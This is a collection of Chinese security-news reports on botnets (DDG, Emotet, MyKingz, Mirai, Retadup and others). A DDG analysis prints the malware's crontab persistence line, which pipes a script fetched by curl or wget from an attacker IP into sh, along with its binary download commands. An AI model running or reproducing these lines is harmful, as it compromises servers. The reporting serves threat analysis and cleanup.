标签: 僵尸网络

DDG 僵尸网络一月升级 9 个版本攻击 Linux 系统挖矿

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/8pJCK6vyxbXJK08VgBZ6Ng 一、概述 DDG僵尸网络最早出现于2017年, 主要是通过对SSH 服务和 Redis 服务进行扫描暴破入侵LINUX系统挖门罗币获利,腾讯安全威胁情报中心曾多次披露该团伙的挖矿活动。近日,腾讯安全发现DDG僵尸网络频繁更新,在最近最近一个月内总共更新了9个版本,平均每周更新2个版本(DDG/5015-DDG/5023)。 DDG挖矿木马执行后会请求下发配置文件,根据配置文件下载挖矿木马wordpress及病毒脚本i.sh执行,此外最新版的DDG挖矿木马一大变化是会下载脚本uninstall.sh,quartz_uninstall.sh卸载腾讯云云镜,阿里云安骑士等安全防护产品以增强挖矿木马在服务器的存活时间。 病毒的挖矿行为会对服务器性能产生极大影响,腾讯安全专家建议Linux管理员注意避免使用弱密码,及时修补系统漏洞,在企业内网部署腾讯T-Sec高级威胁检测系统及时发现黑客控制服务器挖矿的事件发生。 二、详细分析 1.DDG挖矿木马一月更新九个版本 DDG挖矿木马更新频繁,最近一次更新是在3月31日,目前已更新到DDG/5023版本。从服务器文件变更时间看,最近一个月内(2月27-3月31),总共更新了9个版本,平均每周更新2个版本(DDG/5015-DDG/5023) DDG挖矿木马最新的服务器下载地址为:hxxp://67.205.168.20:8000/static/xxxx/ddgs.$(uname -m),其中xxxx为版本号,通过系统命令$(uname -m)获取到具体的系统版本来下载对应的版本。 2.下发配置文件 DDG木马通过向服务器hxxp:[ip]:[port]/slave发送 HTTP POST 请求来获取配置数据,最新的返回的配置数据包括挖矿木马wordpress的md5, ddg最新的更新地址,病毒脚本i.sh下载地址等信息。 3.病毒脚本i.sh 下载i.sh执行,下载地址:hxxp://67.205.168.20:8000/i.sh。主要功能有: (1) 创建定时任务,每15分钟执行一次,定时任务主要内容是下载执行  i.sh (2) 下载更新最新版的DDG病毒,目前已更新到DDG/5023版本 (3) 结束旧版本的木马进程。 4.卸载服务器安防产品 最新版的DDG木马一大变化是会下载脚本uninstall.sh,quartz_uninstall.sh,以卸载腾讯云云镜,阿里云安骑士等安全防护产品以实现在服务器的长时间驻留。 5.改写hosts文件,屏蔽竞争木马的网址 修改hosts文件,将trumpzwlvlyrvlss.onion等竞争木马的网址映射到ip地址0.0.0.0,以实现屏蔽竞争对手木马独占系统资源的目的。修改后的hosts文件如下 6.挖矿木马wordpress 下载门罗币挖矿木马wordpress,该木马由开源挖矿程序XMRig编译,挖矿木马执行后可以发现占用了极大的系统资源。 挖矿时使用矿池: 178.128.108.158:443 103.195.4.139:443 68.183.182.120:443 三、安全建议 腾讯安全专家建议企业采取以下措施防止挖矿木马控制服务器: 1.为Redis添加强密码验证,切勿使用弱口令; 2.定期对服务器进行加固,尽早修复企业服务器相关组件的安全漏洞,并及时进行漏洞修复; 3.推荐企业在终端或服务器上部署腾讯T-Sec终端安全管理系统拦截恶意软件,亦可考虑将Web服务器部署在腾讯云等具备专业安全防护能力的云服务上; 4.推荐企业用户使用腾讯T-Sec高级威胁检测系统(御界)检测黑客攻击和挖矿行为。腾讯T-Sec高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。 IOCs MD5 DDG(5015-5023) e64b247d4cd9f8c58aedc708c822e84b 2c4b9d01d2f244bb6530b48df99d04ae d2a81a0284cdf5280103bee06d5fe928 495dfc4ba85fac2a93e7b3f19d12ea7d 682f839c1097af5fae75e0c5c39fa054 dc87e9c91503cc8f2e8e3249cd0b52d7 c8b416b148d461334ae52aa75c5bfa79 f84a0180ebf1596df4e8e8b8cfcedf63 14fcb1d3a0f6ecea9e18eff2016bc271 挖矿木马: d146612bed765ba32200e0f97d0330c8 i.sh: bceb6cbb2657e9a04b6527161ba931d8 IP: 67.205.168.20 47.94.153.241 61.129.51.79 47.101.35.209 矿池: 178.128.108.158:443 103.195.4.139:443 68.183.182.120:443

僵尸网络 Emotet 能通过相邻 Wi-Fi 网络传播

Emotet 是最具危险性的恶意程序之一,它能窃取银行账号,安装不同类型的其它恶意程序。最近其运营者被发现开始采用新的方法进行传播:通过相邻的 Wi-Fi 网络。它利用名为 wlanAPI 的 API 收集附近无线网络的 SSID、信号强度、加密方法如 WPA,然后使用一个常用用户名密码组合列表尝试登陆。 如果成功登陆,被感染的设备会枚举所有连接到该网络的非隐藏设备,然后使用第二个密码列表去猜测连接设备的凭证。 它还会尝试猜共享资源的管理员密码。如果它成功猜出连接设备的密码,那么它就会加载  Emotet 和其它恶意程序。弱密码用户最好修改密码使用强密码。   (稿源:solidot,封面源自网络。)  

加密货币挖矿僵尸网络使用 Taylor Swift 图像隐藏恶意软件payload

加密货币挖矿僵尸网络MyKingz(也称为Smominru,DarkCloud或Hexmen)在感染链中使用流行歌手泰勒·斯威夫特(Taylor Swift)的图像来隐藏恶意软件payload。   MIKINGZ僵尸网络的简短历史 MyKingz首次出现的时间在2017年底,其在此后一直是市场上最大的加密采矿恶意软件。 MyKingz背后的小组主要致力于感染Windows系统,通过在系统中部署各种挖矿程序来获取利润。 MyKingz具有僵尸网络中最多样化的Internet扫描和感染机制。如果有什么可以扫描的端口或者可以利用的漏洞,MyKingz有相当一部分的概率参与其中。从MySQL到MS-SQL,从Telnet到SSH,从RDP到IPC和WMI等,都是它的目标。 这使僵尸网络发展非常迅速。据报道,在MyKingz诞生的头几个月,它便已经感染了超过525,000个Windows系统,价值超过230万美元。 MyKingz也是EternalBlue漏洞的忠实拥护者,其隐藏在公司网络内部,规模估计高达100万个,并可能更大。 尽管有些人认为僵尸网络自2018年初以来就已经消失了,但Guardicore和Carbon Black在今年夏天发布的报告显示,僵尸网络仍然非常活跃,仍在感染大量计算机,估计每天大约有4700个新系统受到感染。 泰勒·斯威夫特 总部位于英国的安全公司Sophos在本月发现了该僵尸网络的新进展。 由于MyKingz的Internet扫描模块可以识别易受攻击的主机并在受感染的计算机上立足,因此,他们需要一种在被入侵的系统上部署各种恶意软件payload的方法。 据Sophos称,MyKingz的工作人员现在正在尝试进行隐写术,该技术可以使他们将合法文件内的恶意文件隐藏起来。MyKingz团队将恶意EXE隐藏在流行歌手Taylor Swift的JPEG图像内。 图片:Sophos Labs 使用此技术的目的是欺骗在企业网络上运行的安全软件。这些安全产品将只会使主机系统下载普通的JPEG文件,而不下载危险得多的EXE文件。 MyKingz绝不是第一个利用隐写术或名人形象的恶意软件团伙。去年,另一个恶意软件团伙使用女演员斯嘉丽·约翰逊(Scarlett Johansson)的图像在PostgreSQL数据库上部署了恶意软件。 近几个月来,恶意软件帮派也从图像中完全消失了,一些恶意软件操作正在尝试使用其他文件格式进行基于隐写术的攻击,例如WAV音频文件。 但是,尽管这对于MyKingz近期的攻击活动来说可能是一个有趣的发现,但使用Taylor Swift映像隐藏恶意软件并不是最主要的问题。 最主要的问题是,在过去的两年中,MyKingz被证明是对Windows计算机和企业网络的最大威胁之一。该僵尸网络很可能会破坏任何未打补丁或端口未保护的系统。 根据Sophos关于MyKingz的最新报告,MyKingz运营商目前平均每天可赚取约300美元,使他们的历史记录总数达到9,000 XMR左右,价值超过300万美元。     消息来源:ZDNet, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

警惕:DDG 挖矿僵尸网络利用 SSH 弱口令爆破攻击 Linux 服务器

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/twR_Jh3aT8n7be3kbmyDhA   一、背景 腾讯安全专家在为某企业客户进行例行安全巡检过程中,发现客户部署的腾讯御界高级威胁检测系统出现了SSH服务失陷感知信息。在征得客户同意后对客户机器进行远程取证,并结合御界的关键日志进行分析,我们发现这是一起针对SSH服务器弱口令爆破攻击事件。由于发现及时,工程师及时协助客户进行隔离及杀毒,并未造成损失。 腾讯安全御见威胁情报中心对本次攻击事件展开调查,结果发现,这是由大型挖矿僵尸网络DDGMiner发起的攻击事件。DDGMiner是最早于2017年被发现的挖矿僵尸网络,其特点为扫描攻击 SSH服务、Redis 数据库和OrientDB数据库等服务器,并在攻陷的服务器上植入挖矿木马挖掘门罗币获利。从病毒服务器的目录中last modified字段可以看到,本次攻击中样本的更新时间为2019-08-29,目前为4004版本。 对样本进行分析后,发现与此前版本不同的是,样本中新增了针对Nexus Repository Manager漏洞、Supervisord漏洞的利用攻击代码,其攻击流程大致如下: 根据腾讯云鼎实验室监测数据,云上主机遭受来自最新版本DDGMiner的攻击流量从2019.08.29开始出现,在8月30日到达峰值,8月31日到9月1日下降到一定范围之后趋于平稳,大部分攻击流量被有效拦截。 而在少量失陷主机中,90%以上遭到SSH弱口令爆破入侵,由此可见DDGMiner的主要传播方式仍然为SSH爆破。腾讯安全提醒企业用户务必使用高强度的SSH、Redis登录密码,避免因设置不当而遭受攻击造成不必要的损失。 二、详细分析 黑客在通过弱口令爆破或漏洞攻击入侵后首先下载Shell脚本i.sh,并将其安装为crontab定时任务每15分钟执行一次。 mkdir -p /var/spool/cron/crontabsecho "" > /var/spool/cron/rootecho "*/15 * * * * (/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl -fsSL -m180 http://68.183.140.39/i.sh||wget -q -T180 -O- http://68.183.140.39/i.sh) | sh" >> /var/spool/cron/rootcp -f /var/spool/cron/root /var/spool/cron/crontabs/root 然后检测是否已经存在进程nfosfa4,若存在则杀死进程并删除对应的文件,然后从服务器下载ddgs.$(uname -m)保存为nfosfa4,其中uname –m用来获取系统类型并映射到文件名。最后通过chmod +x给nfosfa4赋予可执行权限,从而完成木马的下载更新。 ps auxf | grep -v grep | grep nfosfa4 || rm -rf nfosfa4if [ ! -f "nfosfa4" ]; then curl -fsSL -m1800 http://68.183.140.39/static/4004/ddgs.$(uname -m) -o nfosfa4||wget -q -T1800 http://68.183.140.39/static/4004/ddgs.$(uname -m) -O nfosfa4fichmod +x nfosfa4 接着查找并杀死多个历史版本的病毒进程,进程名分别为nfosbcb、nfosbcc、nfosbcd、nfosbce、nfosfa0、nfosfa1、nfosfa2。 ps auxf | grep -v grep | grep nfosbcb | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosbcc | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosbcd | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosbce | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosfa0 | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosfa1 | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosfa2 | awk '{print $2}' | xargs kill -9 然后启动病毒的最新版本nfosfa4,病毒被存放于以下四个目录之一。 /usr/bin/nfosfa4 /usr/libexec/nfosfa4 /usr/local/bin/nfosfa4 /tmp/nfosfa4 nfosfa4是采用golang语言开发,编译成基于Linux的ELF可执行文件,并且采用UPX加壳保护。golang语言是一款开源编程系统,其优点为简单可靠,支持夸平台编译等。golang语言非常适合服务器编程、分布式系统和数据库相关的网络编程,而DDGMiner恰好符合这些特点。 为了便于分析,我们通过Linux下的UPX脱壳工具进行脱壳,然后使用IDAGolangHelper脚本在IDA中对函数进行重命名。处理之后可以比较清晰的看到样本中漏洞攻击、挖矿、清除挖矿竞品等功能。 在还原后的函数中,可以看到针对SSH爆破、以及针对Redis服务器、Supervisord服务器、Nexus Repository Manager服务器的漏洞利用攻击代码。 样本还使用了hashicorp的go开源库memberlist来构建分布式网络,memberlist是用来管理分布式集群内节点发现、节点失效探测、节点列表的开源程序(github: https://github.com/hashicorp/memberlist)。样本初次到达受害机时,会获取本地节点的地址和状态信息,然后尝试连接到内置的ip列表中的远端节点从而加入远端的集群。 memberlist利用被称为“疫情传播算法”的Gossip协议在僵尸网络集群中同步数据。Gossip 过程由种子节点发起,当一个种子节点有状态需要更新到网络中的其他节点时,它就会随机的选择周围几个节点散播消息,收到消息的节点也会重复该过程,直至最终网络中所有的节点都收到了消息。病毒通过这个过程将某个节点上获得更新的挖矿木马和攻击脚本同步到所有节点。 最后,在挖矿功能部分,通过main_ptr_miner_Download函数下载,main_ptr_miner_Update更新,main_ptr_miner_CheckMd5校验矿机Md5值,以及通过main_ptr_miner_Run启动矿机,并且通过调用main_ptr_miner_killOtherMiner对其他挖矿木马进行清除。 三、安全建议 1、使用高强度的Redis登陆密码、SSH登陆密码, 必要时添加防火墙规则避免其他非信任来源ip访问。 2、及时修复Redis、Nexus Repository Manager、Supervisord服务相关的高危漏洞。 3、已中毒的linux服务器可采用以下手动清理方案。 a)、crontab如果如果包含以下内容,进行清理: "*/15 * * * * (/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl -fsSL -m180 http://68.183.140.39/i.sh||wget -q -T180 -O- http://68.183.140.39/i.sh) | sh" b)、/var/spool/cron/root文件,如果包含以下内容,进行清理: "*/15 * * * * (/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl -fsSL -m180 http://68.183.140.39/i.sh||wget -q -T180 -O- http://68.183.140.39/i.sh) | sh" c)、/var/spool/cron/crontabs/root文件,如果包含以下内容,进行清理: "*/15 * * * * (/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl -fsSL -m180 http://68.183.140.39/i.sh||wget -q -T180 -O- http://68.183.140.39/i.sh) | sh" d)、删除以下文件 /usr/bin/nfosfa4 /usr/libexec/nfosfa4 /usr/local/bin/nfosfa4 /tmp/nfosfa4 /usr/bin/betsbcc /usr/libexec/betsbcc /usr/local/bin/betsbcc /tmp/betsbcc /usr/bin/brhjbcc /usr/libexec/brhjbcc /usr/local/bin/brhjbcc /tmp/brhjbcc e)删除/tmp目录下文件 qW3xT, qW3xT.1, qW3xT.2, qW3xT.3, qW3xT.4, ddgs.3010, ddgs.3011, ddgs.3013, ddgs.3016, 2t3ik, 2t3ik.m, 2t3ik.p, 2t3ik.s, imWBR1, imWBR1.ig, wnTKYg, wnTKYg.noaes, fmt.3018 4、使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。 IOCs IP 68.183.140.39 URL hxxp://68.183.140.39:8000/static/4004/ddgs.x86_64 hxxp://68.183.140.39:8000/static/4004/ddgs.i686 hxxp://68.183.140.39:8000/i.sh MD5 bdfa1c43b3e03880d718609af3b9648f 76309d50ad8412954ca87355274bd8ff 4f0ef26b713d28469d08a8a833339e77 参考链接: https://blog.netlab.360.com/fast-analyze-ddg-v3021-and-v3022/

警方劫持僵尸网络并远程移除 85 万台受感染计算机上的恶意程序

据外媒TechCrunch报道,在一项罕见的壮举中,法国警方劫持了一个庞大的加密货币挖掘僵尸网络,其控制着近百万台受感染的计算机。臭名昭著的Retadup恶意软件感染计算机,主要被用于挖掘加密货币。 虽然恶意软件被用来赚钱,但恶意软件运营商很容易运行其他恶意代码,如间谍软件或勒索软件。恶意软件还具有可信的属性,允许它从计算机传播到计算机。自首次亮相以来,加密货币挖掘恶意软件已遍布全球,包括美国,俄罗斯以及中南美洲。 安全公司Avast通过一篇博文证实该行动是成功的。 该安全公司在发现恶意软件的命令和控制服务器中存在设计缺陷后参与其中。研究人员表示,如果利用得当,该漏洞将“允许我们从受害者的计算机中删除恶意软件”,而不会将任何代码推送到受害者的计算机上。 该漏洞将拆除该操作,但研究人员缺乏推进的法律授权。由于大多数恶意软件的基础设施位于法国,因此Avast与法国警方联系。在7月份接到检察官的批准后,警方继续进行操作,控制服务器并对远程移除了受影响计算机上的恶意程序。 法国警方称该僵尸网络是“世界上被劫持计算机最大的网络之一”。 该操作通过与其Web主机的协作秘密获取恶意软件的命令和控制服务器的快照而起作用。研究人员表示,他们必须谨慎行事,以免恶意软件运营商注意到这一点,因为他们担心恶意软件运营商可以进行报复。 “这些恶意软件的作者主要分发加密货币矿工,从而获得了非常好的被动收入,”这家安全公司表示。“但如果他们意识到我们即将完全取消Retadup,他们可能会将勒索软件推送到成千上万台计算机,同时试图将其恶意软件用于获取最后的利润。” 随着手中的恶意命令和控制服务器的副本,研究人员构建了自己的副本,远程移除了受害者计算机的恶意软件,而不是导致感染。 “(警察)用准备好的杀毒服务器取代了恶意(命令和控制)服务器,该服务器使连接的Retadup实例自毁,”Avast在博客文章中说。“在其活动的第一秒,有数千个机器人连接到它,以便从服务器获取命令。杀毒服务器回复他们并对他们进行杀毒,滥用协议设计缺陷。“ 通过这样做,该公司能够阻止恶意软件的运行,并将恶意代码从超过85万台受感染的计算机上移除。 法国警方网络部门负责人Jean-Dominique Nollet 表示,恶意软件运营商产生了数百万欧元的加密货币。 远程关闭恶意软件僵尸网络是一项罕见的成就 – 但难以实施。 几年前,美国政府撤销了第41条规则,现在允许法官在其管辖范围之外发布搜查和扣押令。许多人认为此举是联邦调查局努力进行远程黑客行动而不受法官管辖权的地方阻碍。批评人士认为,如果一位友好的法官在单一手令上侵入无数的计算机,那将是一个危险的先例。 从那时起,修订后的规则被用于拆除至少一个主要的恶意软件操作,即所谓的Joanap僵尸网络,这被认为与为朝鲜政府工作的黑客有关。   (稿源:cnBeta,封面源自网络。)

黑客轻松接管 29 个僵尸网络,只因运营商太菜

ZDNet 网站报导,安全专家一次性接管了 29 个僵尸网络,原理十分简单,利用了运营商技术“太菜”的方法。 在采访中,安全专家 Subby 介绍了他接管的这 29 个僵尸网络,他指出其实这些僵尸网络都比较小,最初的机器人数量显示总计将近 40 000,但在删除重复数据后,实际数量仅为 25 000,这样的数据对于一个单独的 IoT 僵尸网络来说都是很小的,更不用说是 29 个的总和了。 同时,因为机器少,所以输出流量也相当低,Subby 说:“我能够获得一个可靠的网络流量图,该图表由所有僵尸网络产生的流量组合而来,它的速度低于 300 gbit/ s” 谈到为什么能一次性轻易黑掉 29 个僵尸网络,Subby 解释一些僵尸网络运营商经常使用比较弱的凭证来保护其 C&C 服务器后端。 Subby 使用了一个用户名词典和一个常用密码列表对这些僵尸网络的 C&C 基础设施进行暴力破解,收获非常多。这其中,有一些设备使用了非常弱的用户与密码组合,如`root:root`、`admin:admin`和`oof:oof`。 为什么会发生这种情况?Subby 解释:“很大一部分僵尸网络运营商只是简单地关注在社区中传播的教程,或者是在 YouTube 上学习以建立他们的僵尸网络”,他说:“在对着这些教程按部就班的过程中,他们不会更改默认凭据。而且就算他们更改了凭据,通常密码也很弱,因此容易受到暴力破解的影响。”   (稿源:开源中国,封面源自网络。)

新型 Mirai 木马变种利用 27 个漏洞 瞄准企业设备

据外媒ZDNet报道,安全研究人员发现了一种新型的Mirai IoT恶意软件变种,针对2种设备——智能信号电视和无线演示系统。 Palo Alto Networks 的安全研究人员在今年早些时候发现了一种新的 IoT 僵尸网络,正使用这种新型 Mirai 木马变种。该僵尸网络的制造者似乎已投入大量时间来利用新漏洞升级旧版本的 Mirai,新型变种共使用了 27 个漏洞,其中 11 个是 Mirai 的新型攻击,指向智能 IoT 设备和网络设备。 此外,该僵尸网络背后的黑客还扩展了 Mirai 内置的默认证书列表,以利用该列表来破解使用默认密码的设备,Mirai 默认证书的列表中已增加了 4 种新的用户名和密码的组合。新型变种的目标和作案手法与之前的僵尸网络相同,受感染的设备会在互联网上扫描具有公开 Telnet 端口的其他 IoT 设备,并使用来自其内部列表的默认证书来中断并接管这些新设备。受感染的设备还会扫描互联网上特定的设备类型,然后尝试使用27个漏洞中的一个来接管未打补丁的系统。 通常 Mirai 僵尸网络针对的是路由器、调制解调器、安全摄像头和DVR / NVR,极少数情况下会针对智能电视、手机和一些企业Linux和Apache Struts服务器。然而根据 Palo Alto Networks 研究人员的报告,他们今年发现的新 Mirai 僵尸网络是故意针对两种使用特制技术的新设备类型,即LG Supersign 电视和WePresent WiPG-1000无线演示系统。他们所使用的漏洞在网络上已经暴露过数月,但这是首次被利用于攻击。 新增的漏洞利用: 漏洞 受影响的设备 CVE-2018-17173 LG Supersign电视 WePresent WiPG-1000命令注入 WePresent WiPG-1000无线演示系统 DLink DCS-930L远程命令执行 DLink DCS-930L网络视频摄像机 DLink diagnostic.php命令执行 DLink DIR-645,DIR-815路由器 Zyxel P660HN远程命令执行 Zyxel P660HN-T路由器 CVE-2016至1555年 Netgear WG102,WG103,WN604,WNDAP350,WNDAP360,WNAP320,WNAP210,WNDAP660,WNDAP620器件 CVE-2017-6077,CVE-2017-6334 Netgear DGN2200 N300无线ADSL2 +调制解调器路由器 Netgear Prosafe远程命令执行 Netgear Prosafe WC9500,WC7600,WC7520无线控制器     消息来源:ZDNet,编译:吴烦恼; 本文由 HackerNews.cc 编译整理,封面来源于网络; 转载请注明“ 转自 HackerNews.cc ” 并附上原文链接。

物联网火爆背后隐藏的巨大安全风险

伴随着越来越多的美国家庭、企业和政府推进、购买和部署智能设备,而这些价格相对低廉的物联网设备引发了新的安全问题。目前物联网设备规模突破百亿,在营造更舒适、更高效的生活方式同时由于缺乏真正的安全保护,也成为僵尸网络的一员,被黑客劫持参与各种攻击。 根据 The Conversation 制作的预估图表数据显示,2018 年物联网设备规模已经达到70亿台,非物联网设备数量在 108 亿台,而预估 2025 年物联网设备数量将突破至 215 亿台。这些物联网设备涵盖网络摄像头、血压传感器、温度计、麦克风、智能音箱和毛绒玩具等等,这些产品很多都是由不为人知的小型工厂设计生产,通常没有妥善的安全保护。 2016 年 10 月利用僵尸网络对全球网络发起的攻击 这就意味着大量物联网设备存在非常严重且广泛的漏洞,包括使用弱密码、对通信不加密以及不安全的 Web 界面等等。而黑客往往会劫持数千甚至是数十万个遍布全球的设备来发起 DDoS 在内的攻击。如果制造商在特定类型的设备上设置了不可更改的管理密码,黑客就可以在网络上搜索这些设备,在登陆控制和安装自己的恶意程序之后将设备招募到僵尸网络中。   稿源:cnBeta,封面源自网络;

物联网僵尸网络“捉迷藏”新变种发现:Android 设备成新受害者

继今年1月发现首个物联网僵尸网络Hide and Seek(HNS,捉迷藏)之后,近日Bitdefender Labs发布报告称已经发现新型变种。利用Android开发者调试之用的Android Debug Bridge (ADB)功能中所存在的漏洞,该变种通过WiFi网络连接来感染Android设备,使之成为僵尸网络的一员。 虽然并非所有Android都默认启用ADB功能,但部分Android手机厂商会默认自动启用,可以通过5555端口使用WiFi ADB远程连接就能轻松进行攻击。在连接至默认激活ADB的Android系统之后,允许攻击者以root级别获得shell访问,可以在受感染设备上运行和安装任何东西。 图片来自于 Bitdefender Labs Hide and Seek于今年1月24日由Bitdefender首次发现,感染设备数量大约为1.4万台。不过在1月26日感染设备数量迅速扩大,超过3.2万台物联网设备被感染,而且在设备重启之后依然会保留在受感染的设备上。这种物联网恶意软件在某些情况下会将其自身复制到/etc/init.d/,这是一个在基于Linux的操作系统上放置守护程序脚本的文件夹,就像路由器和物联网设备上的守护程序脚本一样。由此,设备的操作系统将在重启后自动启动恶意软件的进程。   稿源:cnBeta,封面源自网络;

新型僵尸勒索软件 Virobot 肆虐微软 Outlook

根据趋势实验室披露的安全报告,一种全新的僵尸网络勒索软件Virobot正通过微软Outlook进行大肆传播。报告中指出该恶意软件同时兼具僵尸网络和勒索软件的特征,在微软Outlook上以垃圾邮件的方式进行传播。 报告中写道:“Virobot首次发现于2018年9月17日,是对臭名昭著的Locky勒索软件变种分析7天之后发现的。一旦感染Virobot,它就会检查注册表键值(计算机GUID和产品秘钥)来确认系统是否应该加密。然后通过加密随机数生成器(Random Number Generator)来生成加密和解密你要。此外伴随着生成的秘钥,Virobot还会将收集的受害者数据通过POST发送到C&C服务器上。” 趋势科技还表示Virobot还可以记录用户敲击键盘的次数,并共享诸如信用卡信息和密码在内的诸多敏感数据。键盘记录器也会将这些信息发送至C&C服务器上。所以为了预防受到感染,请确保你不要打开非可靠源的附件。   稿源:cnBeta,封面源自网络;